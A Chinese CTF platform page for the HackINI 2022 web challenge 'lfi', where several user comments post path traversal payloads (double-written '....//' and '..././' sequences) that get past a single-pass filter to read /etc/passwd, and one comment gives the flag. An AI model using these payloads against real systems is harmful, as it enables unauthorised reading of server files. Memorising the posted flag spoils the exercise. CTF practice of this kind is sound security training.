lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 2012
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
Zhumeng 1年前

根据页面提示输入language 然后 str_replace只替换一次双写绕过通过路径穿越读取/etc/passwd即可读取flag

回复 0

意大利炮 1年前

/?language=/....//....//....//....//etc/passwd

回复 0

小白帽来挖个漏洞 1年前

解析:https://blog.csdn.net/guanrongl/article/details/142967307

回复 0

阿甘先生 1年前

?language=..//etc/passwd

回复 0

jun1223 1年前

?language=/etc/passwd 这也行

回复 3

userxin 1年前

?language=/../../../../../etc/passwd

回复 0

hbesljx 1年前

直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../

回复 1

1005667204 1年前

使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd

回复 0

18993258097 1年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

菜鸡的小韩 1年前

这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

回复 0

WriteUp

image
a2cai

2 金币

评分(2)

解题动态

赤花满楼 攻破了该题 7分钟前
xingzou 攻破了该题 18小时前
wujita01 攻破了该题 21小时前
lx207 攻破了该题 1天前
.yy. 攻破了该题 1天前
ctflearner 攻破了该题 1天前
BLCAKHUANG 攻破了该题 1天前
白开水 攻破了该题 2天前
pigpigG6768 攻破了该题 2天前
wupeiyuan 攻破了该题 2天前
J辰 攻破了该题 2天前
YuanBao 攻破了该题 2天前
bbbqqqq 攻破了该题 2天前
yu00zzz 攻破了该题 2天前
haidaduck 攻破了该题 3天前
白一梦future 攻破了该题 3天前
弹丸之地小生 攻破了该题 4天前
旺仔小滑头 攻破了该题 4天前
嗨no 攻破了该题 4天前
lyfsh 攻破了该题 4天前
问题反馈